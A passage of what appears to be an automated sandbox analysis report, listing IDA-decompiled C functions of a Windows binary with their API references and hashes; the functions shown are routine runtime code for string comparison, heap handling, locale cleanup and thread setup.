                        0x01072827
                        0x01072872
                        0x0107288a
                        0x01072891
                        0x0107289f
                        0x01072893
                        0x0107289a
                        0x0107289a
                        0x010728a4
                        0x01072809
                        0x0107280d
                        0x0107280d

                        APIs
                        • __ioinit.LIBCMT ref: 01072800
                          • Part of subcall function 01066594: InitOnceExecuteOnce.KERNEL32(01081050,010665CF,00000000,00000000,01062FAF,0107DF38,0000000C,01062084,-00000040,Unknown option "%c" in Repair mode), ref: 010665A2
                        • __get_osfhandle.LIBCMT ref: 01072814
                        • __get_osfhandle.LIBCMT ref: 0107283F
                        • __get_osfhandle.LIBCMT ref: 01072848
                        • __get_osfhandle.LIBCMT ref: 01072854
                        • CloseHandle.KERNEL32(00000000,?,00000000,?,01071CC9,?,?,?,?,?,?,?,?,01061DA1,00000000,00000109), ref: 0107285B
                        • GetLastError.KERNEL32(?,01071CC9,?,?,?,?,?,?,?,?,01061DA1,00000000,00000109), ref: 01072865
                        • __free_osfhnd.LIBCMT ref: 01072872
                        • __dosmaperr.LIBCMT ref: 01072894
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
                        • String ID:
                        • API String ID: 974577687-0
                        • Opcode ID: ed8b67492e3c42d3590f289d0681df3fd925fee0d1afcbd47e5e752ab5e75256
                        • Instruction ID: 9fef578164fdaac27f12ba87d1b6efbd86cbd04ca8f238af5d800b99a46bf208
                        • Opcode Fuzzy Hash: ed8b67492e3c42d3590f289d0681df3fd925fee0d1afcbd47e5e752ab5e75256
                        • Instruction Fuzzy Hash: 4D114C32E0721405D2E1227CA8447BE7B895FA2B34F15039DF9E9D71CADA77E881C358
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 010619F0 Relevance: 13.6, APIs: 9, Instructions: 59memorystringthreadCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E010619F0(WCHAR* _a4, char* _a8) {
				int _t11;
				int _t18;
				void* _t26;
				int _t28;

				_t28 = MultiByteToWideChar(0, 0, _a8, 0xffffffff, 0, 0);
				if(_t28 != 0) {
					_t11 = lstrlenW(_a4);
					_t3 = _t28 - 1; // -1
					if(_t11 < _t3) {
						goto L1;
					} else {
						_t26 = HeapAlloc(GetProcessHeap(), 0, _t28 + _t28);
						MultiByteToWideChar(0, 0, _a8, 0xffffffff, _t26, _t28);
						_t6 = _t28 - 1; // -1
						_t18 = CompareStringW(GetThreadLocale(), 1, _a4, _t6, _t26, _t6);
						HeapFree(GetProcessHeap(), 0, _t26);
						return 0 | _t18 == 0x00000002;
					}
				} else {
					L1:
					return 0;
				}
			}







                        0x01061a07
                        0x01061a0b
                        0x01061a17
                        0x01061a1d
                        0x01061a22
                        0x00000000
                        0x01061a24
                        0x01061a39
                        0x01061a45
                        0x01061a4b
                        0x01061a5d
                        0x01061a6f
                        0x01061a80
                        0x01061a80
                        0x01061a0d
                        0x01061a0d
                        0x01061a11
                        0x01061a11

                        APIs
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01061A01
                        • lstrlenW.KERNEL32(?), ref: 01061A17
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01061A2B
                        • HeapAlloc.KERNEL32(00000000), ref: 01061A32
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01061A45
                        • GetThreadLocale.KERNEL32(00000001,?,-00000001,00000000,-00000001), ref: 01061A56
                        • CompareStringW.KERNEL32(00000000), ref: 01061A5D
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01061A68
                        • HeapFree.KERNEL32(00000000), ref: 01061A6F
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Heap$ByteCharMultiProcessWide$AllocCompareFreeLocaleStringThreadlstrlen
                        • String ID:
                        • API String ID: 3897715424-0
                        • Opcode ID: 8a44a3cfc130ae6e0d3971429a61a1c5afb9823e3839bf1964925b9c7876fa39
                        • Instruction ID: 50280af81effd8d66e6d83fbd8a61d2c07757c83eaa4250eec8d050b21c0e330
                        • Opcode Fuzzy Hash: 8a44a3cfc130ae6e0d3971429a61a1c5afb9823e3839bf1964925b9c7876fa39
                        • Instruction Fuzzy Hash: 20118072944215BBDB321BB4EC0DF9B7B6DEB48762F104614F7A5EA0C4DA769400CBE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01061960 Relevance: 13.6, APIs: 9, Instructions: 58memorystringthreadCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E01061960(WCHAR* _a4, char* _a8) {
				int _t10;
				int _t17;
				void* _t24;
				int _t26;

				_t26 = MultiByteToWideChar(0, 0, _a8, 0xffffffff, 0, 0);
				if(_t26 != 0) {
					_t10 = lstrlenW(_a4);
					_t3 = _t26 - 1; // -1
					if(_t10 != _t3) {
						goto L1;
					} else {
						_t24 = HeapAlloc(GetProcessHeap(), 0, _t26 + _t26);
						MultiByteToWideChar(0, 0, _a8, 0xffffffff, _t24, _t26);
						_t17 = CompareStringW(GetThreadLocale(), 1, _a4, _t26, _t24, _t26);
						HeapFree(GetProcessHeap(), 0, _t24);
						return 0 | _t17 == 0x00000002;
					}
				} else {
					L1:
					return 0;
				}
			}







                        0x01061977
                        0x0106197b
                        0x01061987
                        0x0106198d
                        0x01061992
                        0x00000000
                        0x01061994
                        0x010619a9
                        0x010619b5
                        0x010619ca
                        0x010619dc
                        0x010619ed
                        0x010619ed
                        0x0106197d
                        0x0106197d
                        0x01061981
                        0x01061981

                        APIs
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01061971
                        • lstrlenW.KERNEL32(?), ref: 01061987
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0106199B
                        • HeapAlloc.KERNEL32(00000000), ref: 010619A2
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 010619B5
                        • GetThreadLocale.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 010619C3
                        • CompareStringW.KERNEL32(00000000), ref: 010619CA
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010619D5
                        • HeapFree.KERNEL32(00000000), ref: 010619DC
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Heap$ByteCharMultiProcessWide$AllocCompareFreeLocaleStringThreadlstrlen
                        • String ID:
                        • API String ID: 3897715424-0
                        • Opcode ID: 562e6d8e362c46715b4fa1c9f3be890b228a2c909332fc93da3198dfd52f9f21
                        • Instruction ID: 888bccb101bcd1cd35b9d403740cb586c337398a57f3fe73a3903366a2ceca2a
                        • Opcode Fuzzy Hash: 562e6d8e362c46715b4fa1c9f3be890b228a2c909332fc93da3198dfd52f9f21
                        • Instruction Fuzzy Hash: 05014032944214BBDB321BB4AC0DF9B7F6DEF45761F104611F6A5EA1C4DA769400CBE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01061490 Relevance: 12.1, APIs: 8, Instructions: 99memorystringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 88%
                        			E01061490(WCHAR* _a4) {
				signed int _v8;
				void* _v12;
				int _t16;
				void* _t19;
				long _t21;
				signed int _t28;
				long _t36;
				void* _t37;
				void* _t39;
				void* _t45;
				WCHAR* _t47;
				void* _t48;
				long _t51;
				long _t52;
				void* _t53;
				short* _t54;
				long _t55;
				void* _t57;
				void* _t58;

				_t36 = _a4;
				if(_t36 != 0) {
					_t39 = 1;
					_t51 = _t36;
					do {
						_t16 = lstrlenW(_t51 + 4);
						_t51 =  *_t51;
						_t39 = _t39 + 3 + _t16;
						__eflags = _t51;
					} while (_t51 != 0);
					_t19 = HeapAlloc(GetProcessHeap(), _t51, _t39 + _t39);
					_v12 = _t19;
					_t52 = _t19;
					do {
						_push(0x3d);
						_push(_t36 + 4);
						_t21 = E01062AA0(_t37);
						_t57 = _t57 + 8;
						_a4 = _t21;
						__eflags = _t21;
						if(_t21 != 0) {
							 *_t52 = 0x20;
							_t45 = (_t21 - _t36 - 4 >> 1) + (_t21 - _t36 - 4 >> 1);
							_t53 = _t52 + 2;
							E01063C60(_t53, _t36 + 4, _t45);
							_t54 = _t53 + _t45;
							_t47 =  &(_a4[1]);
							_push(0x20);
							 *_t54 = 0x3d;
							_push(_t47);
							_t55 = _t54 + 2;
							__eflags = _t55;
							_a4 = _t47;
							_t28 = E01062AA0(_t37);
							_t58 = _t57 + 0x14;
							asm("sbb eax, eax");
							_v8 =  ~( ~_t28);
							if(__eflags != 0) {
								 *_t55 = 0x22;
								_t55 = _t55 + 2;
								__eflags = _t55;
							}
							_t48 = lstrlenW(_t47) + _t31;
							E01063C60(_t55, _a4, _t48);
							_t57 = _t58 + 0xc;
							_t52 = _t55 + _t48;
							__eflags = _v8;
							if(_v8 != 0) {
								 *_t52 = 0x22;
								_t52 = _t52 + 2;
								__eflags = _t52;
							}
						}
						_t36 =  *_t36;
						__eflags = _t36;
					} while (_t36 != 0);
					__eflags = 0;
					 *_t52 = 0;
					return _v12;
				} else {
					return 0;
				}
			}






















                        0x01061497
                        0x0106149c
                        0x010614a9
                        0x010614ae
                        0x010614b0
                        0x010614b4
                        0x010614ba
                        0x010614bf
                        0x010614c1
                        0x010614c1
                        0x010614d1
                        0x010614d7
                        0x010614da
                        0x010614e0
                        0x010614e3
                        0x010614e5
                        0x010614e6
                        0x010614eb
                        0x010614ee
                        0x010614f1
                        0x010614f3
                        0x01061507
                        0x0106150a
                        0x01061511
                        0x01061515
                        0x0106151a
                        0x01061524
                        0x01061527
                        0x01061529
                        0x0106152c
                        0x0106152d
                        0x0106152d
                        0x01061530
                        0x01061533
                        0x01061538
                        0x0106153d
                        0x01061541
                        0x01061544
                        0x0106154b
                        0x0106154e
                        0x0106154e
                        0x0106154e
                        0x01061558
                        0x01061560
                        0x01061565
                        0x01061568
                        0x0106156a
                        0x0106156e
                        0x01061575
                        0x01061578
                        0x01061578
                        0x01061578
                        0x0106156e
                        0x0106157b
                        0x0106157d
                        0x0106157d
                        0x01061585
                        0x01061588
                        0x01061593
                        0x0106149e
                        0x010614a4
                        0x010614a4

                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Heap_memmove_wcschrlstrlen$AllocProcess
                        • String ID:
                        • API String ID: 3798481777-0
                        • Opcode ID: cdaa6f93d190887152064542bbd4df7bd5c97cdfc5b8ef9162fe5acf01b877e5
                        • Instruction ID: 24ac637c953df66061c31803499ca73fe0b039d984d21936afe607a96081f0be
                        • Opcode Fuzzy Hash: cdaa6f93d190887152064542bbd4df7bd5c97cdfc5b8ef9162fe5acf01b877e5
                        • Instruction Fuzzy Hash: 6831E577D00206EBD7319F68DC84A9AB7FCAFA4350F15416AED89EB240E635D90187D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 010753D9 Relevance: 10.6, APIs: 7, Instructions: 50COMMON
                        Download Yara Rule
                        C-Code - Quality: 88%
                        			E010753D9(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t11;
				intOrPtr* _t17;
				intOrPtr* _t31;
				void* _t32;

				_push(8);
				_push(0x107e500);
				_t11 = E010668F0(__ebx, __edi, __esi);
				_t31 =  *((intOrPtr*)(_t32 + 8));
				if(_t31 != 0) {
					E01064D39(0xd);
					 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
					if( *(_t31 + 4) != 0 && InterlockedDecrement( *(_t31 + 4)) == 0 &&  *(_t31 + 4) != 0x10809a8) {
						E01064ED2( *(_t31 + 4));
					}
					 *(_t32 - 4) = 0xfffffffe;
					E010759E9();
					if( *_t31 != 0) {
						E01064D39(0xc);
						 *(_t32 - 4) = 1;
						E0107024B( *_t31);
						_t17 =  *_t31;
						if(_t17 != 0 &&  *_t17 == 0 && _t17 != 0x1080d40) {
							E010700F1(_t17);
						}
						 *(_t32 - 4) = 0xfffffffe;
						E010759F5();
					}
					_t11 = E01064ED2(_t31);
				}
				return E01066935(_t11);
			}







                        0x01075944
                        0x01075946
                        0x0107594b
                        0x01075950
                        0x01075955
                        0x0107595d
                        0x01075963
                        0x0107596b
                        0x01075986
                        0x0107598b
                        0x0107598c
                        0x01075993
                        0x0107599b
                        0x0107599f
                        0x010759a5
                        0x010759ae
                        0x010759b4
                        0x010759b8
                        0x010759c7
                        0x010759cc
                        0x010759cd
                        0x010759d4
                        0x010759d4
                        0x010759da
                        0x010759df
                        0x010759e5

                        APIs
                        • __lock.LIBCMT ref: 0107595D
                          • Part of subcall function 01064D39: __mtinitlocknum.LIBCMT ref: 01064D4B
                          • Part of subcall function 01064D39: __amsg_exit.LIBCMT ref: 01064D57
                          • Part of subcall function 01064D39: EnterCriticalSection.KERNEL32(?,?,0106B376,0000000D), ref: 01064D64
                        • InterlockedDecrement.KERNEL32(00000000), ref: 01075970
                        • _free.LIBCMT ref: 01075986
                          • Part of subcall function 01064ED2: HeapFree.KERNEL32(00000000,00000000,?,0106B325,00000000,01062F8B,0107DF38,0000000C,01062084,-00000040,Unknown option "%c" in Repair mode), ref: 01064EE6
                          • Part of subcall function 01064ED2: GetLastError.KERNEL32(00000000,?,0106B325,00000000,01062F8B,0107DF38,0000000C,01062084,-00000040,Unknown option "%c" in Repair mode), ref: 01064EF8
                        • __lock.LIBCMT ref: 0107599F
                        • ___removelocaleref.LIBCMT ref: 010759AE
                        • ___freetlocinfo.LIBCMT ref: 010759C7
                        • _free.LIBCMT ref: 010759DA
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: __lock_free$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                        • String ID:
                        • API String ID: 556454624-0
                        • Opcode ID: dcc7d24a435e672b7c68f2bee225c09b63b7d6e9a53b4f6580b2ad8de36ebc59
                        • Instruction ID: d23acd6f19b6c5fbd4e6a06fcf96036428ffa507910a50b814e5d6cf4224118c
                        • Opcode Fuzzy Hash: dcc7d24a435e672b7c68f2bee225c09b63b7d6e9a53b4f6580b2ad8de36ebc59
                        • Instruction Fuzzy Hash: A6018031D01702EAEBB57F68DC057DD7AE46F12730F20469DF1D8AA0D0DB749580C619
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0106B3E0 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                        Download Yara Rule
                        C-Code - Quality: 91%
                        			E0106B3E0(void* __ebx, void* __edi) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E010653AC(_t3);
				if(E01064E88() != 0) {
					_t6 = E0106BBB1(_t5, E0106B140);
					 *0x1080670 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E01064F0A(1, 0x3b8);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E0106B456();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E0106BBDB(_t9,  *0x1080670, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E0106B334(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E0106B456();
					return 0;
				}
			}








                        0x0106b3e0
                        0x0106b3ec
                        0x0106b3fb
                        0x0106b401
                        0x0106b406
                        0x0106b409
                        0x00000000
                        0x0106b40b
                        0x0106b418
                        0x0106b41c
                        0x0106b41e
                        0x0106b44d
                        0x0106b44d
                        0x0106b452
                        0x0106b455
                        0x0106b420
                        0x0106b42e
                        0x0106b430
                        0x00000000
                        0x0106b432
                        0x0106b432
                        0x0106b434
                        0x0106b435
                        0x0106b43c
                        0x0106b442
                        0x0106b446
                        0x0106b44a
                        0x0106b44c
                        0x0106b44c
                        0x0106b430
                        0x0106b41e
                        0x0106b3ee
                        0x0106b3ee
                        0x0106b3ee
                        0x0106b3f5
                        0x0106b3f5

                        APIs
                        • __init_pointers.LIBCMT ref: 0106B3E0
                          • Part of subcall function 010653AC: RtlEncodePointer.NTDLL(00000000,?,0106B3E5,0106431E,0107DFD8,00000014), ref: 010653AF
                          • Part of subcall function 010653AC: __initp_misc_winsig.LIBCMT ref: 010653D0
                        • __mtinitlocks.LIBCMT ref: 0106B3E5
                          • Part of subcall function 01064E88: InitializeCriticalSectionAndSpinCount.KERNEL32(010803F8,00000FA0,?,?,0106B3EA,0106431E,0107DFD8,00000014), ref: 01064EA6
                        • __mtterm.LIBCMT ref: 0106B3EE
                        • __calloc_crt.LIBCMT ref: 0106B413
                        • __initptd.LIBCMT ref: 0106B435
                        • GetCurrentThreadId.KERNEL32 ref: 0106B43C
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: CountCriticalCurrentEncodeInitializePointerSectionSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                        • String ID:
                        • API String ID: 2211675822-0
                        • Opcode ID: cbf9d27e79999a317173a0e713e8020ad2be0268aa6f239349e5c38e0918410f
                        • Instruction ID: 7789b4e8aa9c632ad8694f532c391716a801157ad41010afb9af6e60e1eb202e
                        • Opcode Fuzzy Hash: cbf9d27e79999a317173a0e713e8020ad2be0268aa6f239349e5c38e0918410f
                        • Instruction Fuzzy Hash: CAF090B27497239AE7B43B387C06ADA3ACCDF21635F204A5AF8D4D50C4EF6184428254
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01061A90 Relevance: 10.1, APIs: 8, Instructions: 74memorystringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E01061A90(void* __eflags, signed int _a4, long* _a8, long* _a12) {
				void* _t21;
				int _t22;
				void* _t26;
				signed int _t27;
				long _t29;
				signed int _t30;
				long* _t31;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				signed int _t40;
				void* _t42;

				_t35 = _a4;
				 *_a8 = 0;
				 *_a12 = 0;
				_t21 = E01061640(_t35, 0);
				_t22 = lstrlenW(_t35);
				_t26 = HeapAlloc(GetProcessHeap(), 0, 2 + (_t22 + _t21) * 2);
				_t42 = _t26;
				if(_t42 == 0) {
					return _t26;
				} else {
					_t27 = E01061640(_t35, _t42);
					_a4 = _t27;
					_t29 = HeapAlloc(GetProcessHeap(), 0, 4 + _t27 * 4);
					_t36 = _t29;
					if(_t36 != 0) {
						_t30 = _a4;
						_t40 = 0;
						if(_t30 <= 0) {
							L6:
							 *(_t36 + _t40 * 4) = 0;
							 *_a8 = _t30;
							_t31 = _a12;
							 *_t31 = _t36;
							return _t31;
						}
						do {
							 *(_t36 + _t40 * 4) = _t42;
							_t32 = lstrlenW(_t42);
							_t30 = _a4;
							_t40 = _t40 + 1;
							_t42 = _t42 + _t32 * 2 + 2;
						} while (_t40 < _t30);
						goto L6;
					}
					return HeapFree(GetProcessHeap(), _t29, _t42);
				}
			}















                        0x01061a97
                        0x01061a9c
                        0x01061aa8
                        0x01061aae
                        0x01061ab6
                        0x01061ad1
                        0x01061ad7
                        0x01061adb
                        0x01061b4d
                        0x01061add
                        0x01061adf
                        0x01061aee
                        0x01061af4
                        0x01061afa
                        0x01061afe
                        0x01061b12
                        0x01061b15
                        0x01061b19
                        0x01061b38
                        0x01061b3b
                        0x01061b42
                        0x01061b44
                        0x01061b47
                        0x00000000
                        0x01061b47
                        0x01061b20
                        0x01061b21
                        0x01061b24
                        0x01061b2d
                        0x01061b30
                        0x01061b31
                        0x01061b34
                        0x00000000
                        0x01061b20
                        0x01061b0f
                        0x01061b0f

                        APIs
                        • lstrlenW.KERNEL32(?), ref: 01061AB6
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01061ACE
                        • HeapAlloc.KERNEL32(00000000), ref: 01061AD1
                        • GetProcessHeap.KERNEL32(00000000), ref: 01061AF1
                        • HeapAlloc.KERNEL32(00000000), ref: 01061AF4
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01061B02
                        • HeapFree.KERNEL32(00000000), ref: 01061B05
                        • lstrlenW.KERNEL32(00000000), ref: 01061B24
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Heap$Process$Alloclstrlen$Free
                        • String ID:
                        • API String ID: 1242203261-0
                        • Opcode ID: 48eba48b9f8cc5c384709479db6d853e69b72b6ba9a75d6894c67b37ac32f9de
                        • Instruction ID: c20c9f97517295658b83cd62faf7575040e2e70fe348ae006dd91f9ee83db3b5
                        • Opcode Fuzzy Hash: 48eba48b9f8cc5c384709479db6d853e69b72b6ba9a75d6894c67b37ac32f9de
                        • Instruction Fuzzy Hash: FB2151B6600219ABD7219F69EC88F9F7BACEF89350F014011FA45DB214D635E900CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01074BD2 Relevance: 9.1, APIs: 6, Instructions: 136COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 88%
                        			E01074BD2(void* __ecx, void* __eflags, signed short _a4, signed int* _a8) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t45;
				signed int _t46;
				signed int _t47;
				signed int _t50;
				signed int _t53;
				signed int _t54;
				signed int _t59;
				void* _t64;
				signed int _t66;
				void* _t68;
				signed int _t75;
				signed int _t79;
				signed short _t80;
				signed int _t82;
				void* _t83;
				signed int _t90;
				void* _t91;
				signed int _t92;
				signed int _t94;
				signed int* _t97;

				_t46 = E01066594(_t45);
				if(_t46 >= 0) {
					_t97 = _a8;
					_t47 = E01065573(_t97);
					_t79 = _t97[3];
					_t94 = _t47;
					__eflags = _t79 & 0x00000082;
					if(__eflags != 0) {
						__eflags = _t79 & 0x00000040;
						if(__eflags == 0) {
							_t75 = 0;
							__eflags = _t79 & 0x00000001;
							if((_t79 & 0x00000001) == 0) {
								L10:
								_t50 = _t97[3] & 0xffffffef | 0x00000002;
								_t97[3] = _t50;
								_t97[1] = _t75;
								__eflags = _t50 & 0x0000010c;
								if((_t50 & 0x0000010c) == 0) {
									_t64 = E01062E24();
									__eflags = _t97 - _t64 + 0x20;
									if(_t97 == _t64 + 0x20) {
										L13:
										_t66 = E0106FFFD(_t94);
										__eflags = _t66;
										if(_t66 == 0) {
											goto L14;
										}
									} else {
										_t68 = E01062E24();
										__eflags = _t97 - _t68 + 0x40;
										if(_t97 != _t68 + 0x40) {
											L14:
											E01070A65(_t97);
										} else {
											goto L13;
										}
									}
								}
								__eflags = _t97[3] & 0x00000108;
								if(__eflags == 0) {
									_v12 = _a4;
									_push(2);
									_push( &_v12);
									_push(_t94);
									_v8 = 2;
									_t53 = E0106BEF0(_t75, _t91, _t94, _t97, __eflags);
									_t80 = _a4;
									_t75 = _t53;
									goto L27;
								} else {
									_t92 = _t97[2];
									 *_t97 = _t92 + 2;
									_t82 =  *_t97 - _t92;
									_v8 = _t82;
									_t97[1] = _t97[6] - 2;
									__eflags = _t82;
									if(__eflags <= 0) {
										__eflags = _t94 - 0xffffffff;
										if(_t94 == 0xffffffff) {
											L22:
											_t83 = 0x1080520;
										} else {
											__eflags = _t94 - 0xfffffffe;
											if(_t94 == 0xfffffffe) {
												goto L22;
											} else {
												_t83 = ((_t94 & 0x0000001f) << 6) +  *((intOrPtr*)(0x1081c60 + (_t94 >> 5) * 4));
											}
										}
										__eflags =  *(_t83 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t75);
											_push(_t75);
											_push(_t94);
											_t59 = E01067780(_t75, _t94, _t97, __eflags);
											__eflags = (_t59 & _t92) - 0xffffffff;
											if((_t59 & _t92) == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t82);
										_push(_t92);
										_push(_t94);
										_t75 = E0106BEF0(_t75, _t92, _t94, _t97, __eflags);
										L25:
										_t80 = _a4;
										 *(_t97[2]) = _t80;
										L27:
										__eflags = _t75 - _v8;
										if(_t75 == _v8) {
											_t54 = _t80 & 0x0000ffff;
										} else {
											L28:
											_t43 =  &(_t97[3]);
											 *_t43 = _t97[3] | 0x00000020;
											__eflags =  *_t43;
											goto L29;
										}
									}
								}
							} else {
								_t97[1] = 0;
								__eflags = _t79 & 0x00000010;
								if((_t79 & 0x00000010) == 0) {
									_t97[3] = _t79 | 0x00000020;
									L29:
									_t54 = 0xffff;
								} else {
									_t90 = _t79 & 0xfffffffe;
									__eflags = _t90;
									 *_t97 = _t97[2];
									_t97[3] = _t90;
									goto L10;
								}
							}
						} else {
							 *((intOrPtr*)(E010647CC(__eflags))) = 0x22;
							goto L6;
						}
					} else {
						 *((intOrPtr*)(E010647CC(__eflags))) = 9;
						L6:
						_t97[3] = _t97[3] | 0x00000020;
						_t54 = 0xffff;
					}
					return _t54;
				} else {
					return _t46 | 0xffffffff;
				}
			}





























                        0x01074bd7
                        0x01074bde
                        0x01074be6
                        0x01074beb
                        0x01074bf1
                        0x01074bf4
                        0x01074bf6
                        0x01074bf9
                        0x01074c08
                        0x01074c0b
                        0x01074c27
                        0x01074c29
                        0x01074c2c
                        0x01074c41
                        0x01074c47
                        0x01074c4a
                        0x01074c4d
                        0x01074c50
                        0x01074c55
                        0x01074c57
                        0x01074c5f
                        0x01074c61
                        0x01074c6f
                        0x01074c70
                        0x01074c76
